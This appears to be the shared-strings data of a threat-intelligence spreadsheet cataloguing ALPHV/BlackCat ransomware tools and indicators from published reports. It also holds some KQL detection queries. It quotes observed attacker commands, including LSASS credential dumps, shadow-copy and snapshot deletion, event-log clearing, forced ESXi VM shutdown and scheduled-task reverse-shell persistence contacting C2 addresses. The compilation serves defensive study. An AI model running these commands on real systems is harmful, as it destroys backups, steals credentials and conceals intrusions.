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harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{B69B9692-73DB-B749-AABD-712ECCCA5C8C}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="80" yWindow="-21100" windowWidth="38080" windowHeight="20800" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
  </bookViews>
  <sheets>
    <sheet name="sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
  </sheets>
  <calcPr calcId="191029"/>
  <pivotCaches>
    <pivotCache cacheId="53"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1595" uniqueCount="770">
  <si>
    <t>eid</t>
  </si>
  <si>
    <t>map_pid</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>eid_type</t>
  </si>
  <si>
    <t>alphv-eid0001</t>
  </si>
  <si>
    <t>Targets
• Windows, 7 to 11, as well as Server 2008r2, 2012,
2016, 2019, 2022 (XP and 2003 can be encrypted
over Server Message Block
• ESXI (at least versions 5.5, 6.5, 7.0.2u)
• Debian (at least versions 7,8 and 9)
• Ubuntu (at least versions 18.04 and 20.04)
• ReadyNAS
• Synology</t>
  </si>
  <si>
    <t>{ "data": "2023-01012", "url": "https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>alphv-eid0002</t>
  </si>
  <si>
    <t>Nirsoft</t>
  </si>
  <si>
    <t>alphv-eid0003</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>alphv-eid0004</t>
  </si>
  <si>
    <t>Cobalt Strike</t>
  </si>
  <si>
    <t>alphv-eid0005</t>
  </si>
  <si>
    <t>ADRecon</t>
  </si>
  <si>
    <t>alphv-eid0006</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>alphv-eid0007</t>
  </si>
  <si>
    <t>Emotet</t>
  </si>
  <si>
    <t>alphv-eid0008</t>
  </si>
  <si>
    <t>Softperfect Netscan</t>
  </si>
  <si>
    <t>alphv-eid0009</t>
  </si>
  <si>
    <t>Bloodhound</t>
  </si>
  <si>
    <t>alphv-eid0010</t>
  </si>
  <si>
    <t>CrackMapExec</t>
  </si>
  <si>
    <t>alphv-eid0011</t>
  </si>
  <si>
    <t>MegaSync</t>
  </si>
  <si>
    <t>alphv-eid0012</t>
  </si>
  <si>
    <t>InVeigh</t>
  </si>
  <si>
    <t>alphv-eid0013</t>
  </si>
  <si>
    <t>AdFind</t>
  </si>
  <si>
    <t>alphv-eid0014</t>
  </si>
  <si>
    <t>Rubeus</t>
  </si>
  <si>
    <t>alphv-eid0015</t>
  </si>
  <si>
    <t>StealBit</t>
  </si>
  <si>
    <t>alphv-eid0016</t>
  </si>
  <si>
    <t>"C:\&lt;path&gt;\v1.0\powershell.exe -WindowStlye Hidden -C $path = 'C:\Users\user\Desktop\&lt;name&gt;.exe; Get-Process | Where-Object {$_.Path -like $path} | Stop-Process -Force;[byte[]]$arr = new-object byte[] 65536;Set-Content -Path $path -Value $arr;Remove-Item -Path $path;</t>
  </si>
  <si>
    <t>alphv-eid0017</t>
  </si>
  <si>
    <t>generic</t>
  </si>
  <si>
    <t>c:\windows\system32\windowspowershell\v1.0\powershell.exe -command  &amp; {(get-content c:\system -raw | set-content c:\ -stream 'cachetask')}
c:\windows\system32\schtasks.exe /create /ru system /sc minute /tn microsoft\windows\wininet\cachetask /tr c:\:cachetask -b &lt;bind port&gt; /f
c:\windows\system32\schtasks.exe /run /tn microsoft\windows\wininet\cachetask</t>
  </si>
  <si>
    <t>During the BlackCat attack, the actors used a tool called reverse-ssh, compiled with the C2 server address embedded, to set up reverse SSH tunnels and provide reverse shells to the attacker. Reverse-ssh was deployed to C:\ directory and named: system, Windows or cache task.
It was also observed hidden by writing to an alternate data stream (ADS) of the C:\ directory using the following command:</t>
  </si>
  <si>
    <t>{ "data": "2022-03-17", "url": "https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/", "tags": ["blackmatter", "blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>c:\windows\system32\schtasks.exe /create /ru system /sc minute /tn microsoft\windows\wininet\cachetask /tr c:\:cachetask -b &lt;bind port&gt; /f</t>
  </si>
  <si>
    <t>c:\windows\system32\schtasks.exe /run /tn microsoft\windows\wininet\cachetask</t>
  </si>
  <si>
    <t>c:\windows\system32\reg.exe add hklm\software\microsoft\windows nt\currentversion\image file execution options\taskmgr.exe /v debugger /t reg_sz /d c:\system</t>
  </si>
  <si>
    <t>cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\windows\temp\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\windows\temp\system.exe -l rtcp://0.0.0.0:1116/127.0.0.1:3388 -f mwss://52[.]149[.]228[.]45:443 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\windows\temp\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\windows\temp\system.exe -l rtcp://0.0.0.0:1117/127.0.0.1:3388 -f mwss://20[.]46[.]245[.]56:443 /st 12:00 /f</t>
  </si>
  <si>
    <t>c:\windows\system32\wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false</t>
  </si>
  <si>
    <t>c:\users\&lt;username&gt;\downloads\gmer\gmer.exe</t>
  </si>
  <si>
    <t>c:\windows\system\procdump.exe -accepteula -ma lsass.exe lsass.dmp</t>
  </si>
  <si>
    <t>c:\windows\system\dumpert.exe lsass.exe</t>
  </si>
  <si>
    <t>powershell rundll32.exe c:\windows\system32\comsvcs.dll, minidump (get-process lsass).id c:\temp\lsass.dmp full</t>
  </si>
  <si>
    <t>cmd.exe /q /c steal.exe 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c cd results 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c dir 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1  cmd.exe /q /c del archive.zip 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c del c:\steal.exe 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t xml:space="preserve">hackbrowerdata </t>
  </si>
  <si>
    <t>cmd.exe /c c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255 c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255 cmd.exe /c c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255</t>
  </si>
  <si>
    <t>c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\adrecon.ps1</t>
  </si>
  <si>
    <t>cmd.exe /q /c teamviewer.exe --getid cmd.exe /q /c dir c:"program files cmd.exe /q /c dir c:"program files (x86) 1 cmd.exe /q /c dir c:"program files (x86)\teamviewer\ cmd.exe /q /c c:"program files (x86)\teamviewer\teamviewer.exe --getid</t>
  </si>
  <si>
    <t>cmd.exe /q /c c:"program files (x86)\teamviewer\teamviewer.exe -info</t>
  </si>
  <si>
    <t>cmd.exe /q /c dir c:"program files (x86)\
cmd.exe /q /c dir c:"program files (x86)"keepass password safe 2\
cmd.exe /q /c type c:"program files (x86)"keepass password safe 2\keepass.exe.config</t>
  </si>
  <si>
    <t>1&gt; \\127.0.0.1\admin$\__&lt;timestamp&gt;.&lt;6 digits&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /q /c netsh advfirewall firewall add rule name=service dir=in protocol=tcp localport=5985 action=permit 1&gt; \\127.0.0.1\c$\windows\temp\qaiumg 2&gt;&amp;1</t>
  </si>
  <si>
    <t>c:\windows\system32\wevtutil.exe set-log active directory web services /enabled:false</t>
  </si>
  <si>
    <t>c:\windows\system32\wevtutil.exe set-log application /enabled:false</t>
  </si>
  <si>
    <t>c:\windows\system32\wevtutil.exe set-log hardwareevents /enabled:false</t>
  </si>
  <si>
    <t>c:\windows\system32\wevtutil.exe set-log internet explorer /enabled:false</t>
  </si>
  <si>
    <t>cmd.exe /q /c reg add hkey_local_machine\system\currentcontrolset\control\lsa /v disablerestrictedadmin /t reg_dword /d 0 1&gt; \\127.0.0.1\admin\$\__&lt;timestamp&gt;\.&lt;num&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /q /c #upload c:\users\&lt;user&gt;\documents\&lt;doc&gt; /home/kali/desktop/&lt;doc&gt; 1&gt; \\127.0.0.1\admin$\&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>cmd.exe /q /c #download c:\users\&lt;user&gt;\documents\&lt;doc&gt; /home/kali/desktop/&lt;doc&gt; 1&gt; \\127.0.0.1\admin$\&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\apply.ps1</t>
  </si>
  <si>
    <t>cmd.exe /q /c gpupdate /force</t>
  </si>
  <si>
    <t>cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\defender.vbs</t>
  </si>
  <si>
    <t>cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\def.vbs</t>
  </si>
  <si>
    <t>cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe --access-token &lt;token&gt;</t>
  </si>
  <si>
    <t>cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe</t>
  </si>
  <si>
    <t>c:\windows\system32\cmd.exe /c fsutil behavior set symlinkevaluation r2l:1</t>
  </si>
  <si>
    <t>c:\windows\system32\cmd.exe /c reg add hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters /v maxmpxct /d 65535 /t reg_dword /f c:\windows\system32\cmd.exe /c fsutil behavior set symlinkevaluation r2r:1</t>
  </si>
  <si>
    <t>c:\windows\system32\cmd.exe /c vssadmin.exe delete shadows /all /quiet c:\windows\system32\cmd.exe /c wmic.exe shadowcopy delete c:\windows\system32\cmd.exe /c arp -a c:\windows\system32\cmd.exe /c bcdedit /set {default}</t>
  </si>
  <si>
    <t>c:\windows\system32\cmd.exe /c cmd.exe /c for /f "tokens=*" %1 in ('wevtutil.exe el') do wevtutil.exe cl "%1"</t>
  </si>
  <si>
    <t>c:\windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no</t>
  </si>
  <si>
    <t>cmd.exe /c “arp -a”</t>
  </si>
  <si>
    <t>{ "url": "https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware/", "tags": [ "blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>/c “reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f”</t>
  </si>
  <si>
    <t>cmd.exe /c for /F “tokens=*” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl %1</t>
  </si>
  <si>
    <t>cmd.exe /c “bcdedit /set {default} recoveryenabled No”</t>
  </si>
  <si>
    <t>cmd.exe /c “bcdedit /set {default}”</t>
  </si>
  <si>
    <t>cmd.exe /c “wmic.exe Shadowcopy Delete”</t>
  </si>
  <si>
    <t>cmd.exe /c “vssadmin.exe Delete Shadows /all /quiet”</t>
  </si>
  <si>
    <t>cmd.exe /c “iisreset.exe /stop”</t>
  </si>
  <si>
    <t>cmd.exe /c “fsutil behavior set SymlinkEvaluation R2R:1”</t>
  </si>
  <si>
    <t>cmd.exe /c “fsutil behavior set SymlinkEvaluation R2L:1”</t>
  </si>
  <si>
    <t>cmd.exe /c “wmic csproduct get UUID”</t>
  </si>
  <si>
    <t>named_pipe</t>
  </si>
  <si>
    <t>\\.\pipe\__rust_anonymous_pipe1__.&lt;Process ID&gt;.&lt;Random number&gt;</t>
  </si>
  <si>
    <t>wmic csproduct get UUID</t>
  </si>
  <si>
    <t>{ "url": "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", "tags": [ "blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>fsutil behavior set SymlinkEvaluation R2L:1</t>
  </si>
  <si>
    <t>fsutil behavior set SymlinkEvaluation R2R:1</t>
  </si>
  <si>
    <t>iisreset.exe /stop</t>
  </si>
  <si>
    <t>reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f</t>
  </si>
  <si>
    <t>vssadmin.exe delete shadows /all /quiet</t>
  </si>
  <si>
    <t>wmic shaodwcopy delete</t>
  </si>
  <si>
    <t>bcdedit /set {default} recoveryenabled No</t>
  </si>
  <si>
    <t xml:space="preserve">cmd.exe /c for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\" </t>
  </si>
  <si>
    <t xml:space="preserve">esxcli --formatter=csv --format-param=fields=="WorldID,DisplayName" vm process list </t>
  </si>
  <si>
    <t xml:space="preserve">awk -F "\"*,\"*" '{system("esxcli vm process kill --type=force --world-id="$1)}' </t>
  </si>
  <si>
    <t>for i in `vim-cmd vmsvc/getallvms| awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done</t>
  </si>
  <si>
    <t>file_path</t>
  </si>
  <si>
    <t xml:space="preserve"> “D:\my\Documents\Visual Studio 2019\setup\obj\Release\setup.pdb”. </t>
  </si>
  <si>
    <t xml:space="preserve">wmic csproduct get UUID </t>
  </si>
  <si>
    <t>{"date":"2023-04-14",  "url": "https://www.varonis.com/blog/blackcat-ransomware", "tags": [ "blackcat", "alphv"]}</t>
  </si>
  <si>
    <t xml:space="preserve">fsutil behavior set SymlinkEvaluation R2R:1 </t>
  </si>
  <si>
    <t xml:space="preserve">reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f </t>
  </si>
  <si>
    <t xml:space="preserve">psexec.exe -accepteula \\&lt;TARGET_HOST&gt; -u &lt;USERNAME&gt; -p &lt;PASSWORD&gt; -s -d -f -c &lt;ALPHV_EXECUTABLE&gt; [FLAGS] [OPTIONS] --access-token &lt;ACCESS_TOKEN&gt; [SUBCOMMAND] </t>
  </si>
  <si>
    <t xml:space="preserve">vssadmin.exe delete shadows /all /quiet </t>
  </si>
  <si>
    <t xml:space="preserve">arp -a </t>
  </si>
  <si>
    <t xml:space="preserve">HKEY_USERS\&lt;SID&gt;\Control Panel\Desktop\WallPaper = "C:\\Users\\&lt;USERNAME&gt;\\Desktop\\RECOVER-&lt;ENCRYPTED_FILE_EXTENSION&gt;-FILES.txt.png" </t>
  </si>
  <si>
    <t xml:space="preserve">for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"" </t>
  </si>
  <si>
    <t xml:space="preserve">for i in `vim-cmd vmsvc/getallvms| awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done </t>
  </si>
  <si>
    <t xml:space="preserve">esxcli --formatter=csv --format-param=fields=="WorldID,DisplayName" vm process list | awk -F "\"*,\"*" '{system("esxcli vm process kill --type=force --world-id="$1)}' </t>
  </si>
  <si>
    <t>for i in `vim-cmd vmsvc/getallvms | awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done</t>
  </si>
  <si>
    <t>vssadmin.exe Delete Shadows /all /quiet</t>
  </si>
  <si>
    <t>{ "data": "2022-06-22", "url": "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/", "tags": ["alphv", "blackcat"]}</t>
  </si>
  <si>
    <t>wmic.exe Shadowcopy Delete</t>
  </si>
  <si>
    <t>reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f</t>
  </si>
  <si>
    <t>for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\”</t>
  </si>
  <si>
    <t>net use \\[computer name]  /user:[domain]\[user] [password] /persistent:no</t>
  </si>
  <si>
    <t>C:\Windows\system32\cmd.exe” /c “bcdedit /set {default}”</t>
  </si>
  <si>
    <t>“C:\Windows\system32\cmd.exe” /c “bcdedit /set {default} recoveryenabled No”</t>
  </si>
  <si>
    <t>“C:\Windows\system32\cmd.exe” /c “vssadmin.exe Delete Shadows /all /quiet”</t>
  </si>
  <si>
    <t>“C:\Windows\system32\cmd.exe” /c “wmic.exe Shadowcopy Delete”</t>
  </si>
  <si>
    <t>“C:\Windows\system32\cmd.exe” /c “cmd.exe /c  for /F \”tokens=*\” Incorrect function. in (‘ wevtutil.exe el ‘) DO wevtutil.exe cl \”Incorrect function. \””</t>
  </si>
  <si>
    <t>Get-ADRGPO</t>
  </si>
  <si>
    <t>Get-ADRDNSZone</t>
  </si>
  <si>
    <t>Get-ADRGPLink</t>
  </si>
  <si>
    <t>An active ‘BlackCat’ ransomware was detected
‘BlackCat’ ransomware was detected
BlackCat ransomware</t>
  </si>
  <si>
    <t>kql</t>
  </si>
  <si>
    <t>DeviceProcessEvents
| where InitiatingProcessFolderPath has "PerfLogs"
| where InitiatingProcessFileName matches regex "[a-z]{3}.exe"
| extend Length = strlen(InitiatingProcessFileName)
| where Length == 7</t>
  </si>
  <si>
    <t>Suspicious process execution in PerfLogs path</t>
  </si>
  <si>
    <t>DeviceProcessEvents
| where ProcessCommandLine has_all("LanmanServer", "parameters", "MaxMpxCt", "65535")</t>
  </si>
  <si>
    <t>Suspicious registry modification of MaxMpxCt parameters</t>
  </si>
  <si>
    <t>DeviceProcessEvents
| where ProcessCommandLine has_all("--access-token", "-v") 
| extend CommandArguments = split(ProcessCommandLine, " ")
| mv-expand CommandArguments
| where CommandArguments matches regex "^[A-Fa-f0-9]{64}$"</t>
  </si>
  <si>
    <t>Suspicious command line indicative of BlackCat ransom payload execution</t>
  </si>
  <si>
    <t>DeviceProcessEvents
| where InitiatingProcessCommandLine has "--access-token"
| where ProcessCommandLine has "get uuid"</t>
  </si>
  <si>
    <t>DeviceNetworkEvents
| where InitiatingProcessCommandLine has_all("copy", "--max-age", "--ignore-existing", "--multi-thread-streams", "--transfers") and InitiatingProcessCommandLine has_any("ftp", "ssh", "-q")</t>
  </si>
  <si>
    <t>Suspected data exfiltration</t>
  </si>
  <si>
    <t>Impacket</t>
  </si>
  <si>
    <t>psexec</t>
  </si>
  <si>
    <t>Gmer</t>
  </si>
  <si>
    <t>{ "data": "2023-12-19", "url": "https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t>Evilginx2</t>
  </si>
  <si>
    <t>Brute Ratel</t>
  </si>
  <si>
    <t>c2</t>
  </si>
  <si>
    <t>Mega</t>
  </si>
  <si>
    <t>AnyDesk</t>
  </si>
  <si>
    <t>Plink</t>
  </si>
  <si>
    <t>Ngrok</t>
  </si>
  <si>
    <t>SplashTop</t>
  </si>
  <si>
    <t>alphv-eid0018</t>
  </si>
  <si>
    <t>alphv-eid0019</t>
  </si>
  <si>
    <t>alphv-eid0020</t>
  </si>
  <si>
    <t>alphv-eid0021</t>
  </si>
  <si>
    <t>alphv-eid0022</t>
  </si>
  <si>
    <t>alphv-eid0023</t>
  </si>
  <si>
    <t>alphv-eid0024</t>
  </si>
  <si>
    <t>alphv-eid0025</t>
  </si>
  <si>
    <t>alphv-eid0026</t>
  </si>
  <si>
    <t>alphv-eid0027</t>
  </si>
  <si>
    <t>alphv-eid0028</t>
  </si>
  <si>
    <t>alphv-eid0029</t>
  </si>
  <si>
    <t>alphv-eid0030</t>
  </si>
  <si>
    <t>alphv-eid0031</t>
  </si>
  <si>
    <t>alphv-eid0032</t>
  </si>
  <si>
    <t>alphv-eid0033</t>
  </si>
  <si>
    <t>alphv-eid0034</t>
  </si>
  <si>
    <t>alphv-eid0035</t>
  </si>
  <si>
    <t>alphv-eid0036</t>
  </si>
  <si>
    <t>alphv-eid0037</t>
  </si>
  <si>
    <t>alphv-eid0038</t>
  </si>
  <si>
    <t>alphv-eid0039</t>
  </si>
  <si>
    <t>alphv-eid0040</t>
  </si>
  <si>
    <t>alphv-eid0041</t>
  </si>
  <si>
    <t>alphv-eid0042</t>
  </si>
  <si>
    <t>alphv-eid0043</t>
  </si>
  <si>
    <t>alphv-eid0044</t>
  </si>
  <si>
    <t>alphv-eid0045</t>
  </si>
  <si>
    <t>alphv-eid0046</t>
  </si>
  <si>
    <t>alphv-eid0047</t>
  </si>
  <si>
    <t>alphv-eid0048</t>
  </si>
  <si>
    <t>alphv-eid0049</t>
  </si>
  <si>
    <t>alphv-eid0050</t>
  </si>
  <si>
    <t>alphv-eid0051</t>
  </si>
  <si>
    <t>alphv-eid0052</t>
  </si>
  <si>
    <t>alphv-eid0053</t>
  </si>
  <si>
    <t>alphv-eid0054</t>
  </si>
  <si>
    <t>alphv-eid0055</t>
  </si>
  <si>
    <t>alphv-eid0056</t>
  </si>
  <si>
    <t>alphv-eid0057</t>
  </si>
  <si>
    <t>alphv-eid0058</t>
  </si>
  <si>
    <t>alphv-eid0059</t>
  </si>
  <si>
    <t>alphv-eid0060</t>
  </si>
  <si>
    <t>alphv-eid0061</t>
  </si>
  <si>
    <t>alphv-eid0062</t>
  </si>
  <si>
    <t>alphv-eid0063</t>
  </si>
  <si>
    <t>alphv-eid0064</t>
  </si>
  <si>
    <t>alphv-eid0065</t>
  </si>
  <si>
    <t>alphv-eid0066</t>
  </si>
  <si>
    <t>alphv-eid0067</t>
  </si>
  <si>
    <t>alphv-eid0068</t>
  </si>
  <si>
    <t>alphv-eid0069</t>
  </si>
  <si>
    <t>alphv-eid0070</t>
  </si>
  <si>
    <t>alphv-eid0071</t>
  </si>
  <si>
    <t>alphv-eid0072</t>
  </si>
  <si>
    <t>alphv-eid0073</t>
  </si>
  <si>
    <t>alphv-eid0074</t>
  </si>
  <si>
    <t>alphv-eid0075</t>
  </si>
  <si>
    <t>alphv-eid0076</t>
  </si>
  <si>
    <t>alphv-eid0077</t>
  </si>
  <si>
    <t>alphv-eid0078</t>
  </si>
  <si>
    <t>alphv-eid0079</t>
  </si>
  <si>
    <t>alphv-eid0080</t>
  </si>
  <si>
    <t>alphv-eid0081</t>
  </si>
  <si>
    <t>alphv-eid0082</t>
  </si>
  <si>
    <t>alphv-eid0083</t>
  </si>
  <si>
    <t>alphv-eid0084</t>
  </si>
  <si>
    <t>alphv-eid0085</t>
  </si>
  <si>
    <t>alphv-eid0086</t>
  </si>
  <si>
    <t>alphv-eid0087</t>
  </si>
  <si>
    <t>alphv-eid0088</t>
  </si>
  <si>
    <t>alphv-eid0089</t>
  </si>
  <si>
    <t>alphv-eid0090</t>
  </si>
  <si>
    <t>alphv-eid0091</t>
  </si>
  <si>
    <t>alphv-eid0092</t>
  </si>
  <si>
    <t>alphv-eid0093</t>
  </si>
  <si>
    <t>alphv-eid0094</t>
  </si>
  <si>
    <t>alphv-eid0095</t>
  </si>
  <si>
    <t>alphv-eid0096</t>
  </si>
  <si>
    <t>alphv-eid0097</t>
  </si>
  <si>
    <t>alphv-eid0098</t>
  </si>
  <si>
    <t>alphv-eid0099</t>
  </si>
  <si>
    <t>alphv-eid0100</t>
  </si>
  <si>
    <t>alphv-eid0101</t>
  </si>
  <si>
    <t>alphv-eid0102</t>
  </si>
  <si>
    <t>alphv-eid0103</t>
  </si>
  <si>
    <t>alphv-eid0104</t>
  </si>
  <si>
    <t>alphv-eid0105</t>
  </si>
  <si>
    <t>alphv-eid0106</t>
  </si>
  <si>
    <t>alphv-eid0107</t>
  </si>
  <si>
    <t>alphv-eid0108</t>
  </si>
  <si>
    <t>alphv-eid0109</t>
  </si>
  <si>
    <t>alphv-eid0110</t>
  </si>
  <si>
    <t>alphv-eid0111</t>
  </si>
  <si>
    <t>alphv-eid0112</t>
  </si>
  <si>
    <t>alphv-eid0113</t>
  </si>
  <si>
    <t>alphv-eid0114</t>
  </si>
  <si>
    <t>alphv-eid0115</t>
  </si>
  <si>
    <t>alphv-eid0116</t>
  </si>
  <si>
    <t>alphv-eid0117</t>
  </si>
  <si>
    <t>alphv-eid0118</t>
  </si>
  <si>
    <t>alphv-eid0119</t>
  </si>
  <si>
    <t>alphv-eid0120</t>
  </si>
  <si>
    <t>alphv-eid0121</t>
  </si>
  <si>
    <t>alphv-eid0122</t>
  </si>
  <si>
    <t>alphv-eid0123</t>
  </si>
  <si>
    <t>alphv-eid0124</t>
  </si>
  <si>
    <t>alphv-eid0125</t>
  </si>
  <si>
    <t>alphv-eid0126</t>
  </si>
  <si>
    <t>alphv-eid0127</t>
  </si>
  <si>
    <t>alphv-eid0128</t>
  </si>
  <si>
    <t>cmdline</t>
  </si>
  <si>
    <t>TA used HOK taskmgr dump lsass</t>
  </si>
  <si>
    <t>Instead, they opened Taskmgr.exe, created a dump file of the LSASS.exe process, and saved the file to a ZIP archive.</t>
  </si>
  <si>
    <t>mdeav_alert</t>
  </si>
  <si>
    <t>mimikatz-pid</t>
  </si>
  <si>
    <t>cobaltstr-pid</t>
  </si>
  <si>
    <t>psexec-pid</t>
  </si>
  <si>
    <t>netscan-pid</t>
  </si>
  <si>
    <t>adfind-pid</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of map_pid</t>
  </si>
  <si>
    <t>procdump-pid</t>
  </si>
  <si>
    <t>comsvcs-pid, rundll-pid</t>
  </si>
  <si>
    <t>netsh-pid</t>
  </si>
  <si>
    <t>registry-pid</t>
  </si>
  <si>
    <t>teamvwr-pid</t>
  </si>
  <si>
    <t>dumpert-pid</t>
  </si>
  <si>
    <t>gmer-pid</t>
  </si>
  <si>
    <t>wmic-pid</t>
  </si>
  <si>
    <t>vss-pid</t>
  </si>
  <si>
    <t>netclt-pid</t>
  </si>
  <si>
    <t>lsass-pid</t>
  </si>
  <si>
    <t>rubeus-pid</t>
  </si>
  <si>
    <t>pshell-pid</t>
  </si>
  <si>
    <t>anydesk-pid</t>
  </si>
  <si>
    <t>vss-pid, wmic-pid</t>
  </si>
  <si>
    <t>{ "data": "2024-09", "url": "https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>Advanced IP Scanner</t>
  </si>
  <si>
    <t>Sliver</t>
  </si>
  <si>
    <t>c:\users\&lt;&gt;\Downloads\Version\setup.exe</t>
  </si>
  <si>
    <t>Nitrogen Malware</t>
  </si>
  <si>
    <t>c:\users\&lt;&gt;\Downloads\Version\python311.dll</t>
  </si>
  <si>
    <t>c:\users\&lt;&gt;\AppData\Local\Notepad\python.exe</t>
  </si>
  <si>
    <t>c:\users\&lt;&gt;\AppData\Local\Notepad\Cryptodrome</t>
  </si>
  <si>
    <t>c:\users\&lt;&gt;\AppData\Local\Notepad\slv.py</t>
  </si>
  <si>
    <t>c:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe</t>
  </si>
  <si>
    <t>legit python</t>
  </si>
  <si>
    <t>c:\users\&lt;&gt;\AppData\Local\Notepad\pythonw.exe worksliv.py</t>
  </si>
  <si>
    <t>slv.py &gt; worksliv.py</t>
  </si>
  <si>
    <t>spawn</t>
  </si>
  <si>
    <t>c:\users\&lt;&gt;\AppData\Local\Notepad\pythonw.exe wo14.py</t>
  </si>
  <si>
    <t>cobalt strike</t>
  </si>
  <si>
    <t>sliver beacon</t>
  </si>
  <si>
    <t>cobalt strike injection</t>
  </si>
  <si>
    <t>C:\Windows\System32\winlogon.exe</t>
  </si>
  <si>
    <t>C:\Windows\System32\cmd.exe</t>
  </si>
  <si>
    <t>C:\Windows\System32\gpupdate.exe</t>
  </si>
  <si>
    <t>StartW
VoidFunc
DLLUnregisterServer
DllRegisterServer
DllInstall</t>
  </si>
  <si>
    <t>Sliver DLL Exports</t>
  </si>
  <si>
    <t>sliver strings found in memory</t>
  </si>
  <si>
    <t>schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /SC ONSTART /F</t>
  </si>
  <si>
    <t>schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr C:\Users\REDACTED\AppData\Local\Notepad\upedge.bat /SC ONSTART /F</t>
  </si>
  <si>
    <t>schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\users\REDACTED\appdata\local\notepad\UpdateEdge.bat /SC ONSTART /F</t>
  </si>
  <si>
    <t>schtasks  /create /ru SYSTEM /tn "OneDrive Security Task-S-1-5-21-REDACTED" /tr c:\windows\adfs\py\UpdateEdge.bat /sc MINUTE /mo 720 /F</t>
  </si>
